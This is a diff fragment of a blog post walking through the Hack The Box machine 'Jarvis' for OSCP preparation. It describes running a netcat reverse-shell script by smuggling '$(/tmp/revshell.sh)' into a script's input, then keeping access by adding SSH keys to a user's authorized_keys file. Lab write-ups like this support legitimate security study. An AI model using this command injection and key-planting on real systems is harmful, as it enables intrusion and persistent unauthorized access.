dm7500/dm7500.github.io/_oscp-prep/2020-02-07-HTB-Jarvis.md

 chmod +x /tmp/revshell.sh
 ```

 So breaking this down, we create the shell script containing the netcat reverse shell, and make it executable with `chmod +x`.
-When we run `simpler.py` again, we simply feed it the command to run the script.
+When we run `simpler.py` again, we simply feed it the command to run the script, which is `$(/tmp/revshell.sh)`.
 This gives us our reverse shell back.

 From here, we're running as `pepper`, so we can simply add our own SSH Public keys to `/home/pepper/.ssh/authorized_keys` to gain SSH access with `ssh pepper@10.10.10.143`.